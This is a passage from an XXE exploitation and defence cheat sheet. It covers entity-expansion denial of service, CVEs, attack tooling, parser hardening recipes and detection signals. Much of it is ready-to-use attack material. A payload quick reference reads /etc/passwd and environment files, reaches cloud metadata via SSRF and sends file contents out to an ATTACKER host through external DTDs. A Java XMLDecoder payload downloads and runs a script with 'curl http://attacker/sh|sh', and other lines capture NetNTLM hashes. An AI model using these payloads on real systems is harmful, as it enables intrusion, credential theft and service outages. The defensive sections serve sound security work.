  <!ENTITY % a "<&#x21;&#x45;&#x4E;&#x54;&#x49;&#x54;&#x59;&#x20;&#x25;&#x20;&#x64;&#x74;&#x64;&#x20;&#x53;&#x59;&#x53;&#x54;&#x45;&#x4D;&#x20;&#x22;http://a/e.dtd&#x22;&#x3E;">
  %a;%dtd;
]>
<data><env>&exfil;</env></data>

12.5 WrapWrap / Lightyear PHP tricks

Swarm’s “Impossible XXE in PHP” demonstrated chaining php://filter chains (convert.iconv.*) to bypass strict <?xml / <!DOCTYPE byte filters by generating the required bytes via iconv transformations inside the filter chain itself. Highly situational but lethal when the simpler bypasses fail.

13. Denial of Service

13.1 Billion Laughs

<!DOCTYPE lolz [
  <!ENTITY lol "lol">
  <!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
  <!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
  <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
  <!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
]>
<lolz>&lol4;</lolz>

The snippet stops at lol4 (10⁴ copies of "lol"); extending the chain to lol9 yields ~10⁹ expansions and gigabytes of memory.

13.2 Quadratic blowup

One giant entity ("A" * 100000) referenced 10,000 times. Bypasses entityExpansionLimit in some parsers because it’s a single entity.
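
The arithmetic behind both attacks is worth making explicit when choosing parser limits. A minimal sketch, assuming the fan-out of 10 and the "lol" base string from 13.1 and the sizes quoted in 13.2; the function names are illustrative.

```python
def billion_laughs_bytes(levels: int, fanout: int = 10, base: str = "lol") -> int:
    """Bytes produced by expanding the top entity of a chain `levels` deep."""
    return len(base.encode("utf-8")) * fanout ** levels


def quadratic_blowup_bytes(entity_len: int, references: int) -> int:
    """Bytes produced by referencing one large entity many times."""
    return entity_len * references


if __name__ == "__main__":
    print("lol4:", billion_laughs_bytes(4))
    print("lol9:", billion_laughs_bytes(9))
    print("quadratic:", quadratic_blowup_bytes(100_000, 10_000))
```

The nested chain grows exponentially with depth, while the quadratic variant reaches a comparable output size with a single entity declaration, which is why a limit on entity count or nesting alone does not cover it.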

13.3 External resource DoS

<!ENTITY x SYSTEM "http://slowloris.internal/never-closes">
<!ENTITY y SYSTEM "file:///dev/urandom">
<!ENTITY z SYSTEM "file:///dev/zero">

Each forces the server thread to hang — cheap resource exhaustion.

13.4 YAML variant (“Billion Lols” in YAML)

YAML anchors/aliases have the same problem. Any parser that re-dereferences aliases recursively is vulnerable. A comparable real case on the XML side: Visual Studio 2022 consumed 100 GB of RAM on a crafted XAML file (XEE, XML Entity Expansion).

14. Real-World CVEs & Chains

CVE	Product	Notes
CVE-2014-3660	libxml2	Entity expansion amplification fix
CVE-2017-10271	Oracle WebLogic	`wls-wsat` XMLDecoder → unauth RCE
CVE-2018-1000840	Processing (Processing Foundation)	XXE in `loadXML()`
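CVE-2019-17571	Apache log4j 1.2 SocketServer	Java object deserialization of untrusted data (not XML-based; related untrusted-input sink)
CVE-2020-5245	dropwizard-validation	EL injection via the self-validating feature (not XXE)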
CVE-2021-33813	JDOM	SAXBuilder external DTD
CVE-2021-34429	Eclipse Jetty	WEB-INF disclosure via encoded URIs (not XXE)
CVE-2022-1471	SnakeYAML (XEE cousin)	tag-based RCE via typed deserialisation
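CVE-2023-34034	Spring Security	WebFlux `**` pattern mismatch → authorization bypass (not XXE)
CVE-2024-22257	Spring Security	Broken access control via `AuthenticatedVoter#vote` with a null Authentication (not XXE)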
CVE-2025-27136	LocalS3 (Java S3 emulator)	`DocumentBuilderFactory` default → unauth file read on `CreateBucketConfiguration`
CVE-2025-49493	Akamai CloudTest	XXE in test-case import allowing file read
CVE-2025-68493	Apache Struts	XXE in action XML configuration parsing
CVE-2026-29924	Grav CMS ≤ 1.7.x	Admin-panel SVG upload → authenticated XXE, file read + SSRF
Cisco ISE	Identity Services Engine	XXE in external-identity integration XML
Xerox FreeFlow Core	JMF listener on :4004	DOCTYPE allowed → unauth SSRF + path traversal → RCE
Horizon3 “Support Ticket to 0-day”	FreeFlow Core	Full exploit chain write-up: XXE → SSRF → path traversal → RCE

Creative chain: OOB XXE used to enumerate /proc/self/environ, leaked a service credential, which unlocked a privileged endpoint that returned the filesystem root. Illustrates that initial “boring” file read often unlocks higher-privilege primitives.

14.2 Bugcrowd / H1 patterns

Recurring paid reports:

SVG avatar → XXE file read on Rails / Node image processors.
DOCX import → blind OOB XXE on HR/ATS platforms.
SAML metadata upload → admin-role XXE on Okta-competitor SSO.
XLSX bulk-import → XXE reading /proc/self/environ → DB credential disclosure.

15. Tooling

15.1 XXEinjector (Ruby)

Automates direct + OOB exploitation. Highlights:

OOB methods: FTP (default), HTTP, gopher (Java ≤ 1.7).
Directory enumeration (Java) or file brute-forcing (any).
Second-order: sends the XXE in one request, reads it back from a second.
--phpfilter auto-wraps reads in php://filter/convert.base64-encode.
--hashes triggers SMB to steal NetNTLMv2.
--expect uses PHP expect wrapper for RCE.
--upload uses jar: to drop files in temp dir.
--xslt tests for XSLT injection.

ruby XXEinjector.rb --host=10.0.0.2 --path=/etc --file=req.txt --oob=http
ruby XXEinjector.rb --host=10.0.0.2 --file=req.txt --phpfilter --brute=files.txt
ruby XXEinjector.rb --host=10.0.0.2 --file=req.txt --hashes

15.2 XXExploiter (Node/TS — luisfontes19)

Generates payloads and serves the companion HTTP/FTP infrastructure in one go. Useful when you don’t want to stand up separate listeners.

15.3 BuffaloWill/oxml_xxe

Embeds XXE payloads into DOCX/XLSX/SVG/GPX/XMP/EPUB/IDML/PDF/HWP wrappers automatically. One-click for file-format vectors.

15.4 GoSecure dtd-finder

java -jar dtd-finder.jar target-image.tar

Scans Docker images / tarballs for DTD files and identifies overridable entities — indispensable for error-based local-DTD attacks.

15.5 defusedxml (Python)

Defensive. Provides hardened drop-in replacements for xml.etree, xml.sax, xml.dom and xmlrpc that reject entity declarations and external references by default, and any DOCTYPE when forbid_dtd=True is passed. Use in any Python codebase handling untrusted XML.

15.6 Burp Suite extensions

Content Type Converter — flip JSON requests to XML/YAML.
HackVertor — tag-based encoding for rapid payload mutation.
XXE-Hunter — auto-detect XXE in requests with XML bodies.
Reissue Request Scripter — build Python scripts for iterative XXE file reads.
Burp Collaborator — essential OOB endpoint.

15.7 OOB infrastructure

Burp Collaborator (paid).
interact.sh / interactsh-client from ProjectDiscovery (free).
canarytokens.org for one-shot DNS tokens.
Dummy FTP for password-channel exfil: ONsec xxe-ftp-server.rb.
slow_http_server.py / slowserver.jar for jar: chain abuse.

16. Detection & Prevention

16.1 Static analysis patterns

Search for any XML parser instantiation not accompanied by hardening flags:

Java    DocumentBuilderFactory.newInstance()     # without setFeature hardening
        SAXParserFactory.newInstance()
        TransformerFactory.newInstance()
        SchemaFactory.newInstance()
        XMLInputFactory.newFactory()
        SAXReader                                # dom4j
        SAXBuilder                               # jdom2
        java.beans.XMLDecoder                    # RCE risk

.NET    new XmlDocument()                        # check .XmlResolver assignments
        new XmlTextReader(...)                   # check .DtdProcessing & .XmlResolver
        new XmlReaderSettings { DtdProcessing = DtdProcessing.Parse }
        XmlSerializer.Deserialize(stream)

Python  lxml.etree.XMLParser(load_dtd=True)
        lxml.etree.XMLParser(resolve_entities=True)
        xml.sax.make_parser()                    # use defusedxml instead
        xml.dom.pulldom / xml.etree              # inspect parser flags

PHP     simplexml_load_string($x, null, LIBXML_NOENT | LIBXML_DTDLOAD)
        DOMDocument::loadXML($x, LIBXML_NOENT)
        libxml_disable_entity_loader(false)      # explicit re-enable

Ruby    Nokogiri::XML(input) { |c| c.noent.dtdload }
        REXML::Document.new(input)

Node    new xmldom.DOMParser()                   # check for entityExpansionLimit
        libxmljs.parseXml(x, { noent: true })    # entity substitution explicitly enabled
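
The patterns above can be turned into a first-pass triage script. The following is a minimal Python sketch, assuming a hypothetical `RISKY_PATTERNS` table and `scan_source` helper (neither comes from an existing tool). It covers only a few of the listed sinks and flags candidate lines; every hit still needs manual review for nearby hardening calls.

```python
import re

# Hypothetical pattern table: a subset of the sinks listed above, keyed by language.
RISKY_PATTERNS = {
    "java": re.compile(
        r"\b(DocumentBuilderFactory|SAXParserFactory|TransformerFactory|SchemaFactory)"
        r"\.newInstance\(\)|\bnew\s+XMLDecoder\b"
    ),
    "dotnet": re.compile(r"\bnew\s+(XmlDocument|XmlTextReader)\b|DtdProcessing\.Parse"),
    "python": re.compile(r"XMLParser\([^)]*(load_dtd|resolve_entities)\s*=\s*True"),
    "php": re.compile(r"LIBXML_NOENT|LIBXML_DTDLOAD|libxml_disable_entity_loader\(\s*false"),
}


def scan_source(text: str, language: str) -> list[tuple[int, str]]:
    """Return (line_number, stripped_line) for every line matching a risky pattern."""
    pattern = RISKY_PATTERNS[language]
    return [
        (number, line.strip())
        for number, line in enumerate(text.splitlines(), start=1)
        if pattern.search(line)
    ]


if __name__ == "__main__":
    sample = "DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();\nint x = 1;"
    for number, line in scan_source(sample, "java"):
        print(f"{number}: {line}")
```

A regex pass like this cannot tell whether `setFeature` hardening follows the instantiation, so treat the output as a review queue rather than a finding list.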

16.2 Secure-by-default recipes

Java:

DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
dbf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
dbf.setFeature("http://xml.org/sax/features/external-general-entities", false);
dbf.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
dbf.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
dbf.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true);
dbf.setXIncludeAware(false);
dbf.setExpandEntityReferences(false);

.NET ≥ 4.5.2:

var settings = new XmlReaderSettings {
    DtdProcessing = DtdProcessing.Prohibit,
    XmlResolver   = null
};
using var reader = XmlReader.Create(stream, settings);

Python:

from defusedxml import ElementTree as ET   # rejects entity declarations by default; pass forbid_dtd=True to reject any DOCTYPE
root = ET.fromstring(xml_bytes)

or native lxml:

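import lxml.etree

# Parser that never loads DTDs, resolves entities, or touches the network.
parser = lxml.etree.XMLParser(
    resolve_entities=False,
    no_network=True,
    load_dtd=False,
    dtd_validation=False,
    huge_tree=False,
)
root = lxml.etree.fromstring(xml_bytes, parser)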
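
Where neither defusedxml nor lxml can be installed, a DOCTYPE pre-flight check can be approximated with the standard library. This is a minimal sketch, not a replacement for the recipes above: `DoctypeForbidden` and `reject_doctype` are hypothetical names, and the assumption is that the application never needs a DTD.

```python
from xml.parsers import expat


class DoctypeForbidden(ValueError):
    """Raised when the input declares a DOCTYPE."""


def reject_doctype(xml_bytes: bytes) -> None:
    """Parse with expat and abort as soon as a DOCTYPE declaration starts."""

    def on_doctype(name, system_id, public_id, has_internal_subset):
        # Raising here propagates out of Parse() and stops the parser.
        raise DoctypeForbidden(f"DOCTYPE {name!r} is not allowed")

    parser = expat.ParserCreate()
    parser.StartDoctypeDeclHandler = on_doctype
    parser.Parse(xml_bytes, True)  # raises expat.ExpatError on malformed input


if __name__ == "__main__":
    reject_doctype(b"<r>ok</r>")  # passes silently
    try:
        reject_doctype(b'<!DOCTYPE r [<!ENTITY x SYSTEM "file:///etc/passwd">]><r>&x;</r>')
    except DoctypeForbidden as exc:
        print("blocked:", exc)
```

Calling `reject_doctype` before handing the bytes to the real parser keeps the check independent of whichever XML library the application uses.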

PHP (modern):

$doc = new DOMDocument();
$doc->loadXML($xml);     // PHP 8+ (libxml2 >= 2.9): external entities are not substituted unless LIBXML_NOENT is passed

Avoid LIBXML_NOENT and LIBXML_DTDLOAD unless absolutely required.

Ruby / Nokogiri:

Nokogiri::XML(input)     # safe defaults; do not add .noent or .dtdload

16.3 Network & runtime defences

Egress-filter the app server: block 169.254.169.254 and arbitrary outbound HTTP from parser contexts. Egress rules cannot stop file:// reads, which never leave the host.
IMDSv2 (AWS) — force HttpTokens=required.
Container egress: default-deny, allowlist specific hostnames only.
WAF rules that block <!DOCTYPE / <!ENTITY on non-XML endpoints and strip them on XML endpoints that don’t need DTD.
Suppress detailed parser errors in production responses (kills error-based variants).
Sandbox file-format processors (ImageMagick policy.xml, LibreOffice profile, SVG rasterisers) in containers without filesystem/network access.
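
The default-deny egress idea above can also be enforced in application code, for example inside a custom entity resolver. A minimal sketch, assuming a hypothetical `egress_decision` helper and an allowlist supplied by the caller. It does not resolve hostnames, so a real policy would also re-check the resolved address.

```python
import ipaddress
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}  # assumption: parser contexts never need file:, ftp:, jar:


def egress_decision(url: str, allowed_hosts: set[str]) -> str:
    """Return 'allow' or a 'deny: ...' reason for an outbound fetch."""
    parts = urlsplit(url)
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        return "deny: scheme"
    host = parts.hostname or ""
    try:
        address = ipaddress.ip_address(host)
    except ValueError:
        # Not an IP literal: only allowlisted hostnames pass.
        return "allow" if host in allowed_hosts else "deny: host not allowlisted"
    if address.is_loopback or address.is_link_local or address.is_private:
        return "deny: internal address"  # link-local covers 169.254.169.254
    return "deny: literal IP"


if __name__ == "__main__":
    allow = {"schemas.example.com"}  # hypothetical allowlist entry
    for url in (
        "http://169.254.169.254/latest/meta-data/",
        "http://[::1]/",
        "file:///etc/passwd",
        "https://schemas.example.com/a.dtd",
    ):
        print(url, "->", egress_decision(url, allow))
```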

16.4 Logging / detection signals

XML parser error logs mentioning external entity, SYSTEM, DOCTYPE.
Outbound DNS/HTTP from application servers to unknown domains.
Requests that include <!DOCTYPE on endpoints that historically received pure-data XML.
Access to /proc/self/environ, /etc/passwd, /root/.ssh/ by parser processes.
Sudden spikes in heap / CPU — possible billion-laughs.
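
Several of these signals can be checked mechanically on captured request bodies. The sketch below is illustrative only: the `SIGNALS` table and `xxe_signals` function are hypothetical names, the path list is a small sample, and encoded payloads (UTF-7, UTF-16) would need normalising before matching.

```python
import re

# Hypothetical signal table; patterns are case-sensitive because XML keywords are.
SIGNALS = {
    "doctype": re.compile(rb"<!DOCTYPE"),
    "entity_decl": re.compile(rb"<!ENTITY"),
    "external_id": re.compile(rb"\b(?:SYSTEM|PUBLIC)\s+[\"']"),
    "sensitive_path": re.compile(rb"/etc/passwd|/proc/self/environ|/root/\.ssh/"),
}


def xxe_signals(body: bytes) -> list[str]:
    """Return the names of all signals present in a raw request body."""
    return [name for name, pattern in SIGNALS.items() if pattern.search(body)]


if __name__ == "__main__":
    body = b'<!DOCTYPE r [<!ENTITY x SYSTEM "file:///etc/passwd">]><r>&x;</r>'
    print(xxe_signals(body))
```

Feeding the result into existing alerting (for example, alert when `doctype` appears on an endpoint that has never received one) matches the third signal in the list.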

16.5 Test checklist

Send <!DOCTYPE r [<!ENTITY x "test">]><r>&x;</r>: does test appear? If so, entities are enabled.
Send OOB probe with Collaborator: do callbacks land? If so, external resolution is enabled.
Send parameter-entity probe: does the remote DTD get fetched? If so, PE expansion is enabled.
Send classic file read: is content reflected?
Send FTP/HTTP exfil via remote DTD: is data captured?
Send error payload with bad path: does the response include a filename fragment?
Send jar: probe (Java): does a temp file appear?
Send billion-laughs with a low nesting depth: does the service degrade? Back off if yes.
File-format wrappers: SVG avatar, DOCX upload, SAML metadata, RSS feed import.
JSON→XML swap on every JSON endpoint that returns data.

17. Payload Quick Reference

17.1 Detection probes

<!-- Local entity round-trip -->
<!DOCTYPE r [<!ENTITY t "entity-works">]><r>&t;</r>

<!-- OOB via general entity -->
<!DOCTYPE r [<!ENTITY p SYSTEM "http://COLLAB/g">]><r>&p;</r>

<!-- OOB via parameter entity (catches stricter parsers) -->
<!DOCTYPE r [<!ENTITY % p SYSTEM "http://COLLAB/p"> %p;]><r/>
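
For repeatable testing, the three probes can be generated with the out-of-band host filled in. A minimal sketch, assuming a hypothetical `build_probes` helper and a placeholder hostname. The local round-trip is demonstrated against Python's stdlib parser, which expands internal entities.

```python
import xml.etree.ElementTree as ET


def build_probes(collab_host: str) -> dict[str, str]:
    """Fill the three detection probes with an out-of-band host."""
    return {
        "local": '<!DOCTYPE r [<!ENTITY t "entity-works">]><r>&t;</r>',
        "general": f'<!DOCTYPE r [<!ENTITY p SYSTEM "http://{collab_host}/g">]><r>&p;</r>',
        "parameter": f'<!DOCTYPE r [<!ENTITY % p SYSTEM "http://{collab_host}/p"> %p;]><r/>',
    }


if __name__ == "__main__":
    probes = build_probes("collab.example")  # hypothetical OOB hostname
    # Only the local probe is parsed here; the other two are meant for the target.
    print(ET.fromstring(probes["local"]).text)
```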

17.2 File read

<!DOCTYPE r [<!ENTITY x SYSTEM "file:///etc/passwd">]><r>&x;</r>
<!DOCTYPE r [<!ENTITY x SYSTEM "file:///c:/windows/win.ini">]><r>&x;</r>
<!DOCTYPE r [<!ENTITY x SYSTEM "file:///proc/self/environ">]><r>&x;</r>
<!DOCTYPE r [<!ENTITY x SYSTEM "php://filter/convert.base64-encode/resource=index.php">]><r>&x;</r>
<!DOCTYPE r [<!ENTITY x SYSTEM "netdoc:///etc/passwd">]><r>&x;</r>
<!DOCTYPE r [<!ENTITY x SYSTEM "jar:file:///tmp/a.jar!/b.txt">]><r>&x;</r>

17.3 SSRF

<!DOCTYPE r [<!ENTITY x SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/">]><r>&x;</r>
<!DOCTYPE r [<!ENTITY x SYSTEM "http://127.0.0.1:6379/">]><r>&x;</r>
<!DOCTYPE r [<!ENTITY x SYSTEM "http://[::1]/">]><r>&x;</r>

17.4 Blind OOB exfiltration (external DTD)

Victim:

<!DOCTYPE r [<!ENTITY % dtd SYSTEM "http://ATTACKER/evil.dtd"> %dtd;]><r/>

evil.dtd (HTTP channel):

<!ENTITY % file SYSTEM "file:///etc/hostname">
<!ENTITY % wrap "<!ENTITY &#x25; exfil SYSTEM 'http://ATTACKER/?x=%file;'>">
%wrap;
%exfil;

evil.dtd (FTP channel for multiline files):

<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % wrap "<!ENTITY &#x25; exfil SYSTEM 'ftp://a:%file;@ATTACKER/'>">
%wrap;
%exfil;
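
Both external DTDs follow the same three-stage chain (read, wrap, fire), so they can be rendered from one template. A minimal sketch for authorised testing, assuming a hypothetical `build_exfil_dtd` helper. The `{data}` placeholder is this sketch's own convention for where the file contents land in the callback URL.

```python
def build_exfil_dtd(target_file: str, callback_template: str) -> str:
    """Render the parameter-entity chain served as the external DTD.

    callback_template must contain '{data}', which is replaced by the
    %file; reference (e.g. 'http://ATTACKER/?x={data}').
    """
    url = callback_template.format(data="%file;")
    return "\n".join(
        [
            f'<!ENTITY % file SYSTEM "file://{target_file}">',
            # &#x25; is an encoded '%': the inner declaration only becomes a
            # parameter-entity declaration once %wrap; is expanded.
            f"<!ENTITY % wrap \"<!ENTITY &#x25; exfil SYSTEM '{url}'>\">",
            "%wrap;",
            "%exfil;",
        ]
    )


if __name__ == "__main__":
    print(build_exfil_dtd("/etc/hostname", "http://ATTACKER/?x={data}"))
    print(build_exfil_dtd("/etc/passwd", "ftp://a:{data}@ATTACKER/"))
```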

17.5 Error-based (external DTD)

<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; err SYSTEM 'file:///nope/%file;'>">
%eval;
%err;

17.6 Error-based (local DTD — GNOME yelp)

<!DOCTYPE r [
  <!ENTITY % local_dtd SYSTEM "file:///usr/share/yelp/dtd/docbookx.dtd">
  <!ENTITY % ISOamso '
    <!ENTITY &#x25; file SYSTEM "file:///etc/passwd">
    <!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; err SYSTEM &#x27;file:///nope/&#x25;file;&#x27;>">
    &#x25;eval;
    &#x25;err;
  '>
  %local_dtd;
]>
<r/>
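
The payload above mixes `&#x25;` and `&#x26;#x25;` because each level of entity-literal nesting consumes one layer of character references. A small sketch of that rule, using a hypothetical `encode_percent` helper:

```python
def encode_percent(depth: int) -> str:
    """Return '%' escaped so it survives `depth` rounds of entity-literal parsing."""
    token = "%"
    for _ in range(depth):
        # Each round hides the leading character behind a numeric reference:
        # '%' becomes '&#x25;', and an existing leading '&' becomes '&#x26;'.
        token = "&#x25;" if token == "%" else "&#x26;" + token[1:]
    return token


if __name__ == "__main__":
    for depth in range(3):
        print(depth, encode_percent(depth))
```

Depth 1 is what `file` and `eval` use inside the redefined `ISOamso` literal; depth 2 is what `err` needs because it sits one literal deeper, inside `eval`.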

17.7 lxml meow:// bypass

<!DOCTYPE r [
  <!ENTITY % a '
    <!ENTITY &#x25; file SYSTEM "file:///tmp/flag.txt">
    <!ENTITY &#x25; b "<!ENTITY c SYSTEM &#x27;meow://&#x25;file;&#x27;>">
  '>
  %a; %b;
]>
<r>&c;</r>

17.8 XInclude

<foo xmlns:xi="http://www.w3.org/2001/XInclude">
  <xi:include parse="text" href="file:///etc/passwd"/>
</foo>

17.9 SVG upload

<?xml version="1.0"?>
<!DOCTYPE svg [<!ENTITY x SYSTEM "file:///etc/hostname">]>
<svg xmlns="http://www.w3.org/2000/svg" width="200" height="40">
  <text y="20">&x;</text>
</svg>

17.10 SOAP

<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <payload><![CDATA[<!DOCTYPE d [<!ENTITY x SYSTEM "file:///etc/passwd">]><d>&x;</d>]]></payload>
  </soap:Body>
</soap:Envelope>

17.11 PHP RCE via expect

<!DOCTYPE r [<!ENTITY x SYSTEM "expect://id">]><r>&x;</r>

17.12 Java XMLDecoder RCE

<?xml version="1.0"?>
<java version="1.7.0_21" class="java.beans.XMLDecoder">
  <object class="java.lang.ProcessBuilder">
    <array class="java.lang.String" length="3">
      <void index="0"><string>/bin/sh</string></void>
      <void index="1"><string>-c</string></void>
      <void index="2"><string>curl http://attacker/sh|sh</string></void>
    </array>
    <void method="start"/>
  </object>
</java>

17.13 Windows NetNTLMv2 capture

<!DOCTYPE r [<!ENTITY x SYSTEM "file:////ATTACKER-IP/share/a.jpg">]><r>&x;</r>

17.14 Billion laughs

<!DOCTYPE lolz [
  <!ENTITY a0 "lol">
  <!ENTITY a1 "&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;">
  <!ENTITY a2 "&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;">
  <!ENTITY a3 "&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;">
  <!ENTITY a4 "&a3;&a3;&a3;&a3;&a3;&a3;&a3;&a3;&a3;&a3;">
]>
<lolz>&a4;</lolz>
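
The growth is simple arithmetic: each level multiplies the previous expansion by the fan-out, so the five-entity sample above expands to 3 × 10^4 = 30,000 bytes, and nine levels above the seed reach 3 × 10^9. A minimal sketch with hypothetical helper names; only the small depth is actually parsed.

```python
import xml.etree.ElementTree as ET


def expanded_size(levels: int, fanout: int = 10, seed: str = "lol") -> int:
    """Bytes produced by the top entity after `levels` rounds of nesting."""
    return len(seed) * fanout**levels


def build_laughs(levels: int, fanout: int = 10, seed: str = "lol") -> str:
    """Generate the nested-entity document for a given (small) depth."""
    decls = [f'<!ENTITY a0 "{seed}">']
    for i in range(1, levels + 1):
        refs = f"&a{i - 1};" * fanout
        decls.append(f'<!ENTITY a{i} "{refs}">')
    body = "\n  ".join(decls)
    return f"<!DOCTYPE lolz [\n  {body}\n]>\n<lolz>&a{levels};</lolz>"


if __name__ == "__main__":
    print(expanded_size(4))  # depth of the sample above
    print(expanded_size(9))  # classic ten-entity variant
    # Safe to parse locally at depth 4; do not raise the depth against shared systems.
    print(len(ET.fromstring(build_laughs(4)).text))
```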

17.15 UTF-7 encoded DOCTYPE

<?xml version="1.0" encoding="UTF-7"?>
+ADwAIQ-DOCTYPE foo+AFs +ADwAIQ-ENTITY xxe SYSTEM +ACI-file:///etc/passwd+ACI +AD4AXQA+
+ADw-foo+AD4AJg-xxe+ADsAPA-/foo+AD4
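
Decoding the body shows why keyword filters miss it: the bytes on the wire never contain `<!DOCTYPE`. A minimal sketch using Python's built-in `utf-7` codec; `normalise_utf7` is a hypothetical helper a filter could call before matching.

```python
PAYLOAD = (
    b'<?xml version="1.0" encoding="UTF-7"?>\n'
    b"+ADwAIQ-DOCTYPE foo+AFs +ADwAIQ-ENTITY xxe SYSTEM +ACI-file:///etc/passwd+ACI +AD4AXQA+\n"
    b"+ADw-foo+AD4AJg-xxe+ADsAPA-/foo+AD4"
)


def normalise_utf7(body: bytes) -> str:
    """Decode a UTF-7 body so keyword filters see the real markup."""
    return body.decode("utf-7")


if __name__ == "__main__":
    print(b"<!DOCTYPE" in PAYLOAD)  # raw bytes hide the keyword
    print(normalise_utf7(PAYLOAD))
```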

Appendix A — High-value local DTDs

OS / Package	Path	Overridable entity
GNOME yelp	`/usr/share/yelp/dtd/docbookx.dtd`	`ISOamso`, `ISOnum`
fontconfig	`/usr/share/xml/fontconfig/fonts.dtd`	`constant`
Xalan (Java)	`xalan2.jar!/org/apache/xalan/res/XSLTInfo.properties`	various
IBM WebSphere	`$WAS/properties/schemas/j2ee/XMLSchema.dtd`	WebSphere-specific
Microsoft	`C:\Windows\System32\wbem\xml\cim20.dtd`	`SuperClassName`
Red Hat / CentOS	`/usr/share/xml/scrollkeeper/dtds/scrollkeeper-omf.dtd`	—
Tomcat	`jsp-api.jar!/jakarta/servlet/jsp/resources/jspxml.dtd`	—

Full list: https://github.com/GoSecure/dtd-finder/tree/master/list

Appendix B — Fingerprinting checklist before escalating

Does the target reflect XML? → test in-band file read.
Does the parser fetch remote DTDs? → OOB exfil.
Does it return parser errors? → error-based.
Egress-filtered? → local-DTD error-based.
Java fingerprint (Server header, cookie, error trace)? → jar:, netdoc:, XMLDecoder, XSLT RCE.
PHP fingerprint? → php://filter, expect://.
.NET fingerprint? → check XmlResolver / DtdProcessing code patterns; pre-4.5.2 is default-vulnerable.
File-upload feature? → SVG / DOCX / XLSX / SAML / RSS wrapper.
Windows host? → SMB NetNTLM hash capture.
Is the XML in a privileged context (root, cloud IAM, K8s service account)? → pivot to secrets, cloud creds, cluster takeover.

References

Key source articles:

HackTricks — XXE / XEE / XML External Entity (definitive cheat sheet).
GoSecure — Advanced XXE Exploitation workshop.
PortSwigger — Blind XXE labs and writeups.
PVS-Studio — XXE in C# applications (parser defaults, BlogEngine.NET case).
OWASP — XML External Entity Prevention Cheat Sheet.
Detectify Labs — Obscure XXE attacks (Office Open XML).
honoki.net — From blind XXE to root-level file read.
Horizon3.ai — From support ticket to zero day (Xerox FreeFlow Core JMF XXE → SSRF → RCE).
OffSec — CVE-2025-27136 LocalS3 XXE.
pwn.vg — Local file read via error-based XXE (XLIFF).
YesWeHack — Bug bounty XXE guide + Dojo CTF #42 write-up.
HackerOne / Bugcrowd — XXE complete guide.
HLOverflow — XXE-study apps (PHP vulnerable server source).
enjoiz — XXEinjector (Ruby automation).
luisfontes19 — xxexploiter (TS payload + server).
BuffaloWill — oxml_xxe (file-format wrapper generator).
GoSecure — dtd-finder (local-DTD discovery).
Swarm / PT Security — Impossible XXE in PHP (WrapWrap / Lightyear bypass).
Cisco / Akamai / Apache / Grav — vendor advisories for real CVEs referenced above.

Compiled for defensive security research, variant hunting, and secure-code review reference.
